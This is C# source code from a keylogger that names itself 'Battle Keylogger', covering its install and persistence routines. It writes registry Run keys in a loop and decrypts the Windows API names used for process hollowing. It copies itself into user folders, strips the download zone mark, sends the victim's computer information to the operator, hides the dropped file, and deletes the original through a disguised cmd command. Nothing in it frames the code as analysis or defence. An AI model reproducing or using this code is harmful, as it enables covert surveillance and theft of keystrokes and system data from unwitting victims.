private static void Startup(object args)
{
string installPath = args.ToString();
do
{
try
{
if (!string.IsNullOrEmpty(Config.HKCU))
{
Registry.CurrentUser.OpenSubKey(StringCipher.Decrypt("[REGISTRYPATH]", Config.MUTEX), true).SetValue(Config.HKCU, installPath);
}
}
catch { }
try
{
if (!string.IsNullOrEmpty(Config.HKLM))
{
Registry.LocalMachine.OpenSubKey(StringCipher.Decrypt("[REGISTRYPATH]", Config.MUTEX), true).SetValue(Config.HKLM, installPath);
}
}
catch { }
}while (!string.IsNullOrEmpty(Config.REGISTRY_PERSISTENCE));
}
public static void Initialize()
{
//DynamicCreateProcess = Core.CreateAPI<CreateProcess>(Core.KERNEL32, StringCipher.Decrypt("[CreateProcessW]", Config.MUTEX));
DynamicGetThreadContext = Core.CreateAPI <GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[GetThreadContext]", Config.MUTEX));
DynamicNtUnmapViewOfSection = Core.CreateAPI <NtUnmapViewOfSection>("ntdll", StringCipher.Decrypt("[NtUnmapViewOfSection]", Config.MUTEX));
DynamicReadProcessMemory = Core.CreateAPI <ReadProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[ReadProcessMemory]", Config.MUTEX));
DynamicResumeThread = Core.CreateAPI <ResumeThread>(Core.KERNEL32, StringCipher.Decrypt("[ResumeThread]", Config.MUTEX));
DynamicSetThreadContext = Core.CreateAPI <SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[SetThreadContext]", Config.MUTEX));
DynamicVirtualAllocEx = Core.CreateAPI <VirtualAllocEx>(Core.KERNEL32, StringCipher.Decrypt("[VirtualAllocEx]", Config.MUTEX));
DynamicWow64GetThreadContext = Core.CreateAPI <Wow64GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64GetThreadContext]", Config.MUTEX));
DynamicWow64SetThreadContext = Core.CreateAPI <Wow64SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64SetThreadContext]", Config.MUTEX));
DynamicWriteProcessMemory = Core.CreateAPI <WriteProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[WriteProcessMemory]", Config.MUTEX));
}
public static void Install()
{
try
{
string runningPath = Application.ExecutablePath;
if (runningPath.Equals(GetInstallPath()))
{
return;
}
string installPath = string.Empty;
if (Config.PATH_TYPE.Equals("1"))
{
installPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
}
else if (Config.PATH_TYPE.Equals("2"))
{
installPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
}
else if (Config.PATH_TYPE.Equals("3"))
{
installPath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
}
else if (Config.PATH_TYPE.Equals("4"))
{
installPath = Path.GetTempPath().Substring(0, Path.GetTempPath().Length - 1);
}
installPath += "\\" + Config.FOLDER_NAME;
if (!Directory.Exists(installPath))
{
try
{
Directory.CreateDirectory(installPath);
}
catch { }
}
installPath += "\\" + Config.FILE_NAME;
try
{
File.Copy(runningPath, installPath, true); //Drops file
}
catch { }
try
{
Core.CallAPI <bool>("kernel32", "DeleteFile", new Type[] { typeof(string) }, installPath + StringCipher.Decrypt("[ZONEID]", Config.MUTEX));
}
catch { }
Core.Upload("Battle Keylogger Installation Notification", "Battle Keylogger has been installed with the Galaxy Logger Installation Module" + Environment.NewLine + ComputerInformation.GetInformation(), "4");
if (!string.IsNullOrEmpty(Config.HIDE_FILE))
{
try
{
File.SetAttributes(installPath, FileAttributes.Hidden);
File.SetAttributes(installPath, FileAttributes.System);
}
catch { }
}
if (!string.IsNullOrEmpty(Config.MELT_FILE))
{
try
{
ProcessStartInfo info = new ProcessStartInfo();
info.CreateNoWindow = true;
info.UseShellExecute = false;
info.FileName = "cmd";
info.Arguments = "/c ping -n 3 127.0.0.1 > nul & del " + '"' + runningPath + '"';
Process.Start(info);
}
catch { }
}
Process.Start(installPath);
//GC.Collect();
Environment.Exit(0);
}
catch (Exception ex) { Config.DumpErrorLog(ex, null); }
}
